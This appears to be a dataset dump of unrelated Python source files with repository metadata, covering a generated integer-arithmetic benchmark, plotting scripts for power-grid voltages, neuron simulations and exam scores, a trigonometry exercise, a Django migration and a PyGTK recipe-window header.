        var132 = arg128 & ((arg129 & var131) + arg127) & -58 - arg130 - (var131 | ((arg127 & 927 & -225) - (543 | -834)) ^ arg129 & (973 ^ (arg129 + var131 - (arg129 - -112762835)))) ^ 740198679 + arg130 | -2032542002 - arg130
        result = arg129 | ((((var131 | var131 ^ arg127) & arg130 ^ arg129 - arg130) - -361) - arg127 + arg130 | var132) + arg127
        return result
    var133 = func26(arg127, arg128)
    def func27(arg134, arg135):
        # Generated helper: pure integer mixing; also closes over var133.
        var136 = var133 | -340 - arg128 | arg134
        var137 = (var133 - arg135) ^ (arg128 - ((arg135 & arg135) + 386)) + var136 ^ var133 | (arg134 + arg134 | (arg128 | (arg135 ^ (arg128 - (arg135 - (var136 + var136 - var136))) ^ 32)) - -1653286 | arg128 - arg135) | arg127
        var138 = 891 + arg128 ^ (arg128 | (arg127 - var137) & (arg134 | -1921798994) - -164 - var133 | var136)
        var139 = 746 ^ (arg135 | var136 - (var138 ^ arg128 - var136 & (((arg128 & arg135 + arg134) - (arg127 - (var138 | 241) | (var138 & var133))) & arg135 ^ (var133 & 275)) - var138) ^ -422571782 + var138 & 1760640996)
        result = var139 | arg127
        return result
    var140 = func27(var133, arg128)
    var141 = arg128 & 150929293 - 873 + var140
    if var140 < var133:
        var142 = -833111019 & var141
    else:
        var142 = arg127 - var133 ^ -1285656674 + var140
    var143 = var140 & var140 - 1535011185 | var141
    var144 = var141 | arg127 & (-2018659109 ^ 466)
    var145 = var144 - 690
    var146 = var141 + arg128 & arg128 ^ var144
    var147 = var144 - arg128
    var148 = var140 | var143
    var149 = -353 ^ var144
    if var141 < arg128:
        var150 = ((var140 - -469) + var148) | var141
    else:
        var150 = arg127 + var140 & -876 ^ 1640523082
    var151 = var141 - arg128
    var152 = -259 ^ var141 - var148
    var153 = var152 ^ (var144 + arg127) | var141
    var154 = (-549 & var146) ^ var146 | arg128
    var155 = var149 | var140
    var156 = var148 - var143 + var148
    var157 = (arg127 - var146 ^ arg127) | var147
    var158 = var157 - var157
    var159 = var157 + arg127
    result = var146 ^ (var148 - var159 | ((var152 ^ var154 & var140 + (var159 | var149) + 236254376) ^ var133 | var149))
    return result
def func12(arg58, arg59):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Exercises the class14/16/18/20 stubs in loops (their return values are
    discarded) before mixing func13/func22/func23 results. Kept verbatim.
    """
    var64 = func13(arg59, arg58)
    if var64 < arg58:
        var69 = class14()
    else:
        var69 = class16()
    for var70 in range(35):
        var71 = var69.func15
        var71(arg58, var64)
    if arg58 < var64:
        var76 = class18()
    else:
        var76 = class20()
    for var77 in range(10):
        var76.func19(var64, arg59)
    var100 = func22(arg58, arg59)
    var122 = func23(arg58, var64)
    var123 = (arg58 + var64 ^ (var64 + ((var64 & var64 | arg58) & var64 - var122)) | (var122 + 67)) ^ var64
    var124 = -656775216 ^ arg58 - var64 - arg59
    result = var123 + var64 + arg59 | (var64 ^ var124)
    return result
def func23(arg101, arg102):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Pure function of its two arguments. Kept verbatim on purpose.
    """
    var103 = -722 & 1488809552
    var104 = var103 + arg101 | var103
    var105 = arg102 - arg102
    var106 = var103 - arg101
    var107 = -775 & var103
    var108 = (var106 & var106 | var103) - var106
    var109 = 1463055881 + -884 - arg101 & var106
    var110 = arg102 + -1772363859
    var111 = (var106 + var106) + var103 ^ 283
    var112 = var106 & var108
    var113 = arg101 + 1144166770
    var114 = var106 - var109 & var110 | -1606906187
    var115 = arg102 - arg102 + var109
    var116 = var105 + var108
    var117 = var114 | var106 ^ var110
    var118 = (var103 ^ var110 ^ var111) & arg102
    var119 = var115 ^ (var114 ^ var118) - var109
    var120 = var113 + var108 ^ arg102
    var121 = var107 ^ var115
    result = var121 | var109 | var106 - (((var121 | var119 | (var115 & var113)) + var109 ^ var108 + var108) | var114) ^ var103
    return result
def func22(arg78, arg79):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Pure function of its two arguments. Kept verbatim on purpose.
    """
    var80 = (-950093545 - arg79 | arg78) + arg78
    var81 = (158561442 & 593 + -936156509) + var80
    var82 = 1393819247 | (arg78 ^ (-210 ^ 721))
    if arg78 < var81:
        var83 = (-1111548489 + var81 ^ var81) & var80
    else:
        var83 = arg79 + var82 - var80 | arg79
    var84 = -409505401 | -1548960377 - 460
    var85 = (arg79 | arg78 ^ var80) + arg78
    var86 = arg78 + (1856271165 & var81) - var82
    if var85 < var80:
        var87 = var86 | var80
    else:
        var87 = 886 - -977593229 ^ var82 | arg78
    if arg78 < var80:
        var88 = ((var81 & var85) + arg78) - arg79
    else:
        var88 = var86 ^ -683
    var89 = (arg78 | var86) + var86 + arg78
    var90 = var81 ^ ((var86 & var80) - arg78)
    var91 = arg79 ^ -245 - 634660613 & var81
    var92 = 1207571156 + var85
    var93 = (var82 & var91 - arg79) & var91
    var94 = var82 + (var89 | var86)
    var95 = var82 - var90 & var92 ^ var89
    var96 = (arg78 ^ (490711036 + var84)) - var91
    var97 = ((var90 - 107) + var95) & -66
    if var94 < var96:
        var98 = (var80 ^ var95 & var81) + var81
    else:
        var98 = var96 & var82 + var85 + arg79
    var99 = ((var97 | var81) + var97) ^ var93
    result = (var85 ^ (((479887675 + var92 & var85 & (var85 & var84)) | var86 + var80 - var97) ^ 1738260675) | var95) + var96
    return result
class class20(object):
    """Generated stub; func19 returns its first argument (x | x == x)."""
    def func19(self, arg74, arg75):
        return arg74 | arg74
class class18(object):
    """Generated stub; func19 offsets its first argument by 2139436850."""
    def func19(self, arg72, arg73):
        return arg72 - -2139436850
class class16(object):
    """Generated stub; the OR with -1 forces the inner term to -1, so
    func15 yields -1 for any integer arguments."""
    def func15(self, arg67, arg68):
        inner = ((-532693810 & -1021966746) - arg68) | -1 | arg68
        return (1 + inner) - 1
class class14(class16):
    """Generated stub overriding class16.func15 with a fixed xor/offset mix."""
    def func15(self, arg65, arg66):
        mixed = -1 + arg66 - -80430261 - arg65
        return mixed ^ (442142498 + (arg66 - arg66))
def func13(arg60, arg61):
    """Fold (arg60 - i) ^ acc into acc for i in range(25); arg61 is unused."""
    acc = 0
    for step in range(25):
        acc = acc + ((arg60 - step) ^ acc)
    return acc
def func1(arg1, arg2):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Exercises the class2/class4 stubs over func6's generator (return values
    discarded) before pure integer mixing. Kept verbatim on purpose.
    """
    if arg2 < arg1:
        var7 = class2()
    else:
        var7 = class4()
    for var8 in func6(arg1, arg2):
        var7.func3(arg2, arg2)
    var46 = arg1 | arg1
    if arg1 < var46:
        var47 = arg1 | ((var46 & arg2) & -152)
    else:
        var47 = (arg1 - arg1) & -1119432941
    var48 = 406486576 ^ arg2 + arg1 & -38443491
    var49 = 2135735539 ^ -550437908
    var50 = var46 ^ var49
    var51 = 471 - (974 & (arg2 ^ -658))
    var52 = ((var51 ^ var46) - 760) | var51
    var53 = (arg1 + var46) + var52 - var48
    var54 = (var53 + var52 - var48) | var53
    var55 = -722564471 ^ var52 & var50 & 1323834004
    var56 = (var48 - var55) - var48 & -557993836
    var57 = -2126399968 | var46
    result = var55 - var51 - (var49 ^ ((var56 | (arg1 ^ var55)) ^ var57 ^ var49))
    return result
def func7(arg11, arg12):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Calls func10 (which temporarily monkey-patches the global ``len``);
    the final result depends only on var32 and arg12. Kept verbatim.
    """
    var13 = func10()
    var30 = func11(arg11, arg12)
    var31 = 413783674 + arg12
    var32 = (var30 & arg12) ^ arg12
    if arg11 < var32:
        var33 = ((arg11 & var31) & var31) | var32
    else:
        var33 = var31 + var13
    if var32 < arg12:
        var34 = (var30 - arg12) + (var30 ^ arg11 & arg12 - var13 - arg12 ^ -742 & var32 ^ var32 & arg11 & var31 & arg11 - (var13 | 880642707 - (var13 | (553 & var13 - -534 | var31)) ^ -1201025472 | arg11))
    else:
        var34 = var13 | (var30 & arg12) ^ var13
    result = var32 & -275 - arg12
    return result
def func11(arg14, arg15):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Pure function of its two arguments. Kept verbatim on purpose.
    """
    var16 = 358 - 167 + 875051580 ^ 348
    if arg14 < arg14:
        var17 = arg15 ^ (590993375 | -546) + 293
    else:
        var17 = arg15 | 86
    var18 = (arg15 - arg15) ^ arg14 & -903868833
    var19 = 457 - var16
    if var19 < var19:
        var20 = -562 ^ (arg15 - arg15)
    else:
        var20 = 143840302 | (var16 & var16) - arg15
    var21 = arg14 & 906
    var22 = var16 & 936622172 + var19 | arg14
    var23 = var22 + var22 - var22 - var18
    if var19 < arg15:
        var24 = 867142190 ^ (var21 ^ -49844891 + var23)
    else:
        var24 = ((332 ^ var16) | arg14) + var19
    var25 = var21 ^ var22
    var26 = -377 ^ var19
    var27 = (var16 ^ var26) + var16 ^ 1618868888
    var28 = arg14 | (var21 + -558) ^ var27
    var29 = var22 & var16 ^ var23 + arg14
    result = (var23 & var25) & (var16 | var18)
    return result
def func10():
    """Return -6: func8 rebinds the module-level ``len`` to ``lambda x: -6``
    before the call, and func9 deletes the override again."""
    func8()
    result = len((((i | ((6 - 4) ^ 6)) - -4 ^ (6 ^ (3 | 1 | -8) - 6 + -3)) | 3 for i in range(35)))
    func9()
    return result
def func9():
    """Remove the module-level ``len`` override installed by func8."""
    global len
    del len
def func8():
    """Shadow the builtin ``len`` with a module-global constant function."""
    global len
    len = lambda x : -6
def func6(arg9, arg10):
    """Machine-generated generator yielding eleven derived integer values.

    The first value calls func7 (which touches the module global ``len``
    via func10). Kept verbatim on purpose.
    """
    var35 = func7(arg10, 375)
    yield var35
    var36 = arg9 | -932 + 952
    yield var36
    var37 = var36 + -721 - -1482373484 - -323
    yield var37
    var38 = 58 | -1299279161
    yield var38
    var39 = 414 | var36 + arg9 ^ arg9
    yield var39
    var40 = arg9 | var39
    yield var40
    var41 = var38 ^ 841504964 | var40 ^ arg9
    yield var41
    var42 = arg10 ^ (var40 | 970864904 - -241)
    yield var42
    var43 = -10 + var39 | var38 + arg10
    yield var43
    var44 = arg10 & var38
    yield var44
    var45 = var38 & (var39 | arg9 | var37)
    yield var45
class class4(object):
    """Generated stub strategy object; func3 discards its arguments."""
    def func3(self, arg5, arg6):
        result = 0
        return result
class class2(object):
    """Generated stub mixing arg3 with a fixed xor mask and offset;
    arg4 is unused."""
    def func3(self, arg3, arg4):
        masked = (1 + -1) | (arg3 ^ -440174602)
        return arg3 + (masked - 1979601014) + 1
def func49(arg297, arg298):
    """Recursive no-op chase: ``(-5 - -5) & rest`` is always 0 for ints
    (``&`` binds looser than ``-``), so the recursion bottoms out at 0.
    Both arguments are ignored."""
    def descend(depth, rest):
        value = (-5 - -5) & rest
        if depth == 0:
            return value
        return descend(depth - 1, value)
    return descend(10, 0)
if __name__ == "__main__":
    # Benchmark driver: for each generated top-level function, run 25000
    # iterations. Note x is reset to 5 every iteration, so only the final
    # iteration's value is printed — but the stateful closures
    # (var164/var200/var222) and the class stubs still get exercised.
    print('prog_size: 5')
    print('func_number: 12')
    print('arg_number: 58')
    for i in range(25000):
        x = 5
        x = func1(x, i)
    print(x, end='')
    print('prog_size: 5')
    print('func_number: 24')
    print('arg_number: 125')
    for i in range(25000):
        x = 5
        x = func12(x, i)
    print(x, end='')
    print('prog_size: 5')
    print('func_number: 34')
    print('arg_number: 196')
    for i in range(25000):
        x = 5
        x = func24(x, i)
    print(x, end='')
    print('prog_size: 5')
    print('func_number: 44')
    print('arg_number: 289')
    for i in range(25000):
        x = 5
        x = func34(x, i)
    print(x, end='')
    print('prog_size: 5')
    print('func_number: 54')
    print('arg_number: 323')
    for i in range(25000):
        x = 5
        x = func44(x, i)
    print(x, end='')
dheerajgupta0001/wrldc_mis_monthly_report_generator | 19,181,323,961,168 | 0174b245119bdd3a8f9be1423610a54325fc4a8f | 27e6a0f12334076bca2281d501453f90b7762eb0 | /src/app/section_1_7/section_1_7_3.py | fc59148efefc60abd7ebf0460021af26ec205f1e | [
"MIT"
]
| permissive | https://github.com/dheerajgupta0001/wrldc_mis_monthly_report_generator | 44491d0488620426a191dc52d1317f8756274170 | dd5ae6f28ec6bf8e6532820fd71dd63f8b223f0b | refs/heads/main | 2023-06-20T08:14:19.928757 | 2021-07-20T05:55:39 | 2021-07-20T05:55:39 | 338,298,197 | 0 | 0 | MIT | false | 2021-03-24T05:36:40 | 2021-02-12T11:22:11 | 2021-03-03T07:57:48 | 2021-03-24T05:36:39 | 29,507 | 0 | 0 | 0 | Python | false | false | import datetime as dt
from src.repos.metricsData.metricsDataRepo import MetricsDataRepo
import pandas as pd
from src.app.section_1_7.section_1_7_2 import strip400
from src.app.section_1_7.section_1_7_1 import strip765
from src.typeDefs.section_1_7.section_1_7_3 import ISection_1_7_3
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import numpy as np
def fetchSection1_7_3Context(appDbConnStr: str, startDt: dt.datetime, endDt: dt.datetime) -> ISection_1_7_3:
fullMonthName = dt.datetime.strftime(startDt, "%b' %Y")
mRepo = MetricsDataRepo(appDbConnStr)
metrics = ["Max", "Min"]
lvls = [400, 765]
numPltsPerPage = 6
numPages = 0
for m in metrics:
for l in lvls:
voltData = mRepo.getDailyVoltDataByLevel(l, m, startDt, endDt)
voltDf = pd.DataFrame(voltData)
voltDf["data_val"] = pd.to_numeric(
voltDf["data_val"], errors='coerce')
voltDf = voltDf.pivot(index="data_time", columns="entity_name",
values="data_val")
if l == 400:
voltDf.columns = [strip400(x) for x in voltDf.columns]
elif l == 765:
voltDf.columns = [strip765(x) for x in voltDf.columns]
lowThresh = 300 if l == 400 else 650
voltDf[voltDf < lowThresh] = np.nan
numStations = voltDf.shape[1]
pageStartStnInd = 0
while pageStartStnInd < numStations:
pageEndStnInd = pageStartStnInd + numPltsPerPage
if pageEndStnInd >= numStations:
pageEndStnInd = numStations-1
# create a plotting area and get the figure, axes handle in return
fig, ax = plt.subplots(figsize=(7.5, 4.5))
pltTitle = "{0}. Voltage Profile during the month of {1} - {2} kV S/S".format(
m, fullMonthName, l)
# set plot title
ax.set_title(pltTitle)
# set x and y labels
ax.set_xlabel('Date')
ax.set_ylabel('kV')
#c0c0c0
ax.set_facecolor("#c0c0c0")
# enable y axis grid lines
ax.yaxis.grid(True)
for stnIter in range(pageStartStnInd, pageEndStnInd+1):
stnName = voltDf.columns[stnIter]
la, = ax.plot(
voltDf.index.values, voltDf[stnName].values, linestyle='solid', marker='.')
la.set_label(stnName)
# set x axis locator as day of month
ax.set_xlim((startDt, endDt), auto=True)
ax.xaxis.set_major_locator(mdates.DayLocator())
# set x axis formatter as month name
ax.xaxis.set_major_formatter(mdates.DateFormatter('%d'))
# enable legends
ax.legend(bbox_to_anchor=(0.0, -0.3, 1, 0), loc='lower center',
ncol=numPltsPerPage, mode="expand", borderaxespad=0.)
fig.subplots_adjust(bottom=0.2, left=0.07, right=0.99)
fig.savefig('assets/section_1_7_3_{0}.png'.format(numPages))
numPages += 1
pageStartStnInd = pageEndStnInd + 1
sectionData: ISection_1_7_3 = {'num_plts_sec_1_7_3': numPages}
return sectionData
| UTF-8 | Python | false | false | 3,376 | py | 90 | section_1_7_3.py | 88 | 0.561315 | 0.530806 | 0 | 71 | 46.549296 | 108 |
RenatoBoeno/exercicios-de-estudo-python | 11,940,009,089,161 | fb2e5824434bcb935273ecf5db35cab738b9d975 | d4acc74ed78675f6657ee73e4ed395c45e2f47a1 | /Exercícios de estudo Python/018 - Seno, Cosseno e Tangente.py | 7474f867cf7eb157720469b6f6072ebbcdbfb0f6 | []
| no_license | https://github.com/RenatoBoeno/exercicios-de-estudo-python | 72f5ac74544423d0d3ff18da5ad2325d9dff9412 | bc1f1c17cd3f323f7f29dae9653f939c69998511 | refs/heads/master | 2020-05-16T15:03:09.429085 | 2019-04-25T16:09:58 | 2019-04-25T16:09:58 | 183,120,450 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import math
an = float(input("digite o angulo que deseja:"))
seno = math.sin(math.radians((an)))
print ("angulo{:.2f} seno {:.2f}".format(an,seno))
cosseno = math.cos(math.radians((an)))
print(" o angulo de {:.2f} tem o cosseno{:.2f}".format(an,cosseno))
tangente = math.tan(math.radians(an))
print(" o angulo é {:.2f} tem a tangente{:.2f}".format(an,tangente)) | UTF-8 | Python | false | false | 362 | py | 46 | 018 - Seno, Cosseno e Tangente.py | 46 | 0.67313 | 0.65651 | 0 | 8 | 44.25 | 68 |
cafischer/cell_fitting | 17,085,379,945,832 | db46a16978e63e708086a746af6b82640b358a05 | 032a1ad3c94e1126729417a16e2a95743d121244 | /cell_fitting/optimization/evaluation/plot_sine_stimulus/plot_sine_stimulus.py | 6e1f5cca9c146e3587a73f2e1f6142e496418b59 | []
| no_license | https://github.com/cafischer/cell_fitting | 0fd928f5ae59488e12c77648c2e6227c1911d0e9 | 75a81987e1b455f43b5abdc8a9baf6b8f863bee2 | refs/heads/master | 2021-01-23T19:27:30.635173 | 2019-09-14T08:46:57 | 2019-09-14T08:46:57 | 44,301,986 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from __future__ import division
import matplotlib.pyplot as pl
import numpy as np
from nrn_wrapper import Cell
import os
import json
from cell_fitting.optimization.evaluation.plot_sine_stimulus import simulate_sine_stimulus
pl.style.use('paper')
if __name__ == '__main__':
# parameters
save_dir = '/home/cf/Phd/programming/projects/cell_fitting/cell_fitting/results/best_models/6'
model_dir = os.path.join(save_dir, 'cell.json')
mechanism_dir = '../../../model/channels/vavoulis'
# load model
cell = Cell.from_modeldir(model_dir, mechanism_dir)
# apply stim
amp1 = 0.4 # 0.5
amp2 = 0.2 # 0.2
freq1 = 0.1 # 0.5: 1000, 0.25: 2000, 0.1: 5000, 0.05: 10000
sine1_dur = 1./freq1 * 1000 / 2
freq2 = 5 # 5 # 20
onset_dur = offset_dur = 500
dt = 0.01
sine_params = {'amp1': amp1, 'amp2': amp2, 'sine1_dur': sine1_dur, 'freq2': freq2, 'onset_dur': onset_dur,
'offset_dur': offset_dur, 'dt': dt}
v, t, i_inj = simulate_sine_stimulus(cell, amp1, amp2, sine1_dur, freq2, onset_dur, offset_dur, dt)
# plot
save_dir_img = os.path.join(save_dir, 'img', 'sine_stimulus', 'traces',
str(amp1)+'_'+str(amp2)+'_'+str(freq1)+'_'+str(freq2))
if not os.path.exists(save_dir_img):
os.makedirs(save_dir_img)
np.save(os.path.join(save_dir_img, 'v.npy'), v)
np.save(os.path.join(save_dir_img, 't.npy'), t)
np.save(os.path.join(save_dir_img, 'i_inj.npy'), i_inj)
with open(os.path.join(save_dir_img, 'sine_params.json'), 'w') as f:
json.dump(sine_params, f)
pl.figure()
#pl.title('amp1: ' + str(amp1) + ', amp2: ' + str(amp2) + ', sine1dur: ' + str(sine1_dur) + ', freq2: ' + str(freq2), fontsize=16)
pl.plot(t, v, 'r', linewidth=1)
pl.xlabel('Time (ms)')
pl.ylabel('Membrane Potential (mV)')
pl.tight_layout()
pl.savefig(os.path.join(save_dir_img, 'v.png'))
pl.show()
# pl.figure()
# pl.title('amp1: ' + str(amp1) + ', amp2: ' + str(amp2) + ', sine1dur: ' + str(sine1_dur) + ', freq2: ' + str(freq2), fontsize=16)
# pl.plot(t, v, 'r', linewidth=1)
# pl.xlabel('Time (ms)')
# pl.ylabel('Membrane Potential (mV)')
# pl.xlim(4000, 6000)
# pl.tight_layout()
# pl.savefig(os.path.join(save_dir_img, 'v_zoom.png'))
# pl.show()
# # plot influence of input current
# from cell_fitting.optimization.helpers import *
# L = cell.soma.L # um
# diam = cell.soma.diam # um
# cm = cell.soma.cm # uF/cm**2
# dt = t[1] - t[0] # ms
# dvdt = np.concatenate((np.array([(v[1] - v[0]) / dt]), np.diff(v) / dt)) # V
#
# # convert units
# cell_area = get_cellarea(convert_from_unit('u', L),
# convert_from_unit('u', diam)) # m**2
# Cm = convert_from_unit('c', cm) * cell_area # F
# i_inj_c = convert_from_unit('n', np.array(i_inj)) # A
#
# i_ion = -1 * (dvdt * Cm - i_inj_c) # A
#
# simulation_params = {'sec': ('soma', None), 'i_inj': i_inj, 'v_init': -75, 'tstop': sine1_dur+1000,
# 'dt': dt, 'celsius': 35, 'onset': 200}
# from cell_fitting.optimization.simulate import simulate_currents
# currents, channel_list = simulate_currents(cell, simulation_params)
#
# i_ion_from_currents = 10 * np.sum(currents) * cell_area
#
# pl.figure()
# #pl.title('amp1: ' + str(amp1) + ', amp2: ' + str(amp2) + ', sine1dur: ' + str(sine1_dur) + ', freq2: ' + str(freq2))
# pl.plot(t, dvdt * Cm, 'k', label='$c_m dV/dt$')
# pl.plot(t, i_ion, 'r', label='$I_{ion}$')
# #pl.plot(t, i_ion_from_currents, 'k', label='$I_{ion} from currents$')
# pl.plot(t, i_inj_c, 'b', label='$I_{inj}$')
# pl.hlines(0, 1850, 2050, colors='0.5', linestyles='-')
# pl.ylim(-1.5*1e-9, 1.5*1e-9)
# pl.xlim(1850, 2050)
# pl.xlabel('Time (ms)')
# pl.ylabel('Current (A)')
# pl.legend()
# pl.tight_layout()
# pl.show()
#
# # plot currents
# pl.figure()
# for c, current in enumerate(currents):
# pl.plot(t, -1*current, label=channel_list[c])
# pl.hlines(0, 1850, 2050, colors='0.5', linestyles='-')
# pl.xlim(1850, 2050)
# pl.ylim(-0.15, 0.15)
# pl.legend()
# pl.tight_layout()
# pl.show()
#
# channel_list = np.array(channel_list)
# pl.figure()
# pl.plot(t, -1 * currents[channel_list == 'nat'][0] + -1*currents[channel_list == 'kdr'][0]+-1 * currents[channel_list == 'pas'][0], label='nat + kdr + pas')
# pl.plot(t, -1 * currents[channel_list == 'nap'][0] + -1*currents[channel_list == 'kdr'][0]+-1 * currents[channel_list == 'pas'][0], label='nap + kdr + pas')
# pl.plot(t, -1 * currents[channel_list == 'pas'][0], label='pas')
# pl.hlines(0, 1850, 2050, colors='0.5', linestyles='-')
# pl.xlim(1850, 2050)
# pl.ylim(-0.15, 0.15)
# pl.legend()
# pl.tight_layout()
# pl.show() | UTF-8 | Python | false | false | 4,926 | py | 374 | plot_sine_stimulus.py | 295 | 0.556638 | 0.510556 | 0 | 123 | 39.056911 | 162 |
minuptt/HCMC_Scores_2020 | 7,507,602,862,821 | 737607594f49fb282b536de319f780994e611139 | 5999eda4fb021305efb6c4833ccbdedd31d3334f | /problem1.py | 03690170bedd0338244d649e4b2c3a29cba6e898 | []
| no_license | https://github.com/minuptt/HCMC_Scores_2020 | 6e65de8a2137607dcdc4e3ada62890067ed3ceff | 1fd495ff8032789621f2c04574831af77cd77e89 | refs/heads/master | 2023-07-07T09:53:42.597414 | 2021-07-29T23:51:56 | 2021-07-29T23:51:56 | 390,868,774 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # read file
with open("clean_data.csv", encoding = "utf8") as file:
data = file.read().split("\n")
header = data[0]
students = data[1:]
students.pop()
total_student = len(students)
header = header.split(",")
subjects = header[5:]
for i in range (total_student):
students[i] = students[i].split(",")
not_take_exam = [0,0,0,0,0,0,0,0,0,0,0]
for s in students:
for i in range (5,16):
if s[i] == "-1":
not_take_exam[i-5] += 1
not_take_exam_percentage = [0,0,0,0,0,0,0,0,0,0,0]
for i in range (0,11):
not_take_exam_percentage[i] = round(not_take_exam[i]*100/total_student, 2)
import matplotlib.pyplot as plt
import numpy as np
figure, axis = plt.subplots()
y_pos = np.arange(len(subjects))
axis.set_ylim(0,100)
plt.bar(y_pos, not_take_exam_percentage)
plt.xticks(y_pos, subjects)
plt.ylabel('Percentage')
plt.title('Not taking exam or not registering on subject')
rects = axis.patches
for rect, label in zip(rects, not_take_exam):
height = rect.get_height()
axis.text(rect.get_x() + rect.get_width() / 2, height + 2, label, ha = 'center', va = 'bottom')
plt.show()
| UTF-8 | Python | false | false | 1,117 | py | 8 | problem1.py | 7 | 0.644584 | 0.604297 | 0 | 43 | 24.930233 | 99 |
ricardobtxr/experiment-scripts | 12,987,981,122,941 | e304b0d9a196a6d4e9d4c6173756dc1090f20cc6 | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf/gsn-edf_ut=2.5_rd=0.5_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=90/sched.py | 8f6222df4dd6d8bce8e0d235fb7a22a1d8bdd99c | []
| no_license | https://github.com/ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | -X FMLP -Q 0 -L 5 110 400
-X FMLP -Q 0 -L 5 95 300
-X FMLP -Q 1 -L 2 44 150
-X FMLP -Q 1 -L 2 40 175
-X FMLP -Q 2 -L 1 38 150
-X FMLP -Q 2 -L 1 33 125
-X FMLP -Q 3 -L 1 26 250
25 125
23 250
22 300
20 100
14 125
10 125
| UTF-8 | Python | false | false | 239 | py | 6,754 | sched.py | 6,466 | 0.539749 | 0.205021 | 0 | 13 | 17.384615 | 28 |
timaakulich/django_telegram_bots | 39,026 | fec17d696119b8312ed4f29c472e579d32dd9426 | c824fba398787231aeca3b4735796ae04b194b98 | /bots/migrations/0009_auto_20161002_1050.py | a020ce078a841784a82cac5d8cee61dfa8349555 | []
| no_license | https://github.com/timaakulich/django_telegram_bots | 475635426fdabdc44f1735a642df2a3ebf3a1cfb | d9296c6eb34be6326fbf46f2909aa57521319971 | refs/heads/master | 2018-01-02T08:01:16.985301 | 2016-10-02T11:37:16 | 2016-10-02T11:37:16 | 69,358,186 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-02 10:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bots', '0008_auto_20160928_1746'),
]
operations = [
migrations.AddField(
model_name='botcommand',
name='command_type',
field=models.CharField(choices=[('message', 'Message'), ('photo', 'Photo'), ('document', 'Document'), ('location', 'Location'), ('sticker', 'Sticker')], default='message', max_length=10, null=True),
),
migrations.AlterField(
model_name='botcommand',
name='source',
field=models.TextField(help_text='Write your code here. You can use variables from "variables" field. Also you have access to "bot", "message", "command_params" variables.'),
),
]
| UTF-8 | Python | false | false | 909 | py | 12 | 0009_auto_20161002_1050.py | 11 | 0.607261 | 0.568757 | 0 | 25 | 35.36 | 210 |
gitGNU/gnu_brewtools | 3,513,283,269,773 | eec5e35d0b79d066a5aa1a0e58cb68210d5aec90 | 19c7a026d7222fd50f8816370dafb19cc979e237 | /gui/wndRecipe.py | 0e03d710f1f8e6992e396529aee4e4ee6a8e95f5 | [
"BSD-3-Clause"
]
| permissive | https://github.com/gitGNU/gnu_brewtools | 1ba8c9e75e17a151dfddb63dfca90927b4a78df9 | ba09dc11e23d93e623f497286f3f2c3e9aaa41c2 | refs/heads/master | 2023-08-06T06:34:26.551798 | 2008-05-08T22:00:49 | 2008-05-08T22:00:49 | 90,340,617 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
* Copyright (c) 2008, Flagon Slayer Brewery
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of the Flagon Slayer Brewery nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY Flagon Slayer Brewery ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL Flagon Slayer Brewery BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import pygtk
pygtk.require("2.0")
import gtk, gtk.glade
from recipe import*
from obj_manager import*
from util import*
from wndRecipeProcedure import*
class RecipeWindow:
"""
#########################################################################
# Author: Reuben Otero #
# Created: March 26, 2008 #
# Modified: April 10, 2008 #
#-----------------------------------------------------------------------#
# Class: RecipeWindow #
# Opens the GUI window to create and store a new #
# Recipe into the application. Creates the button #
# handlers and has the functions to support them. #
#-----------------------------------------------------------------------#
# Sub-Class: ProcedureWindow #
# Opens the GUI window to create and store a new #
# Procedures into the new Recipe Object. Creates the button #
# handlers and has the functions to support them. #
#-----------------------------------------------------------------------#
# Support Classes: #
# Imports recipe.py #
# creates and stores new recipe information #
# Imports obj_manager #
# class file to handle all objects created #
# sub-classed with Indexer.py #
#-----------------------------------------------------------------------#
# Indexer: #
# Uses Indexer class sub-class through ojb_manager #
# Uses include createing and destroying objects #
# #
# 'Create an object' #
# Variable = self.indexer.get(ObjectClass, 'NameofObject) #
# #
# 'Delete an oject' #
# Variable = None #
# self.indexer.deleteObject(ObjectClass, 'NameofObject') #
#-----------------------------------------------------------------------#
"""
#Global Varialbles
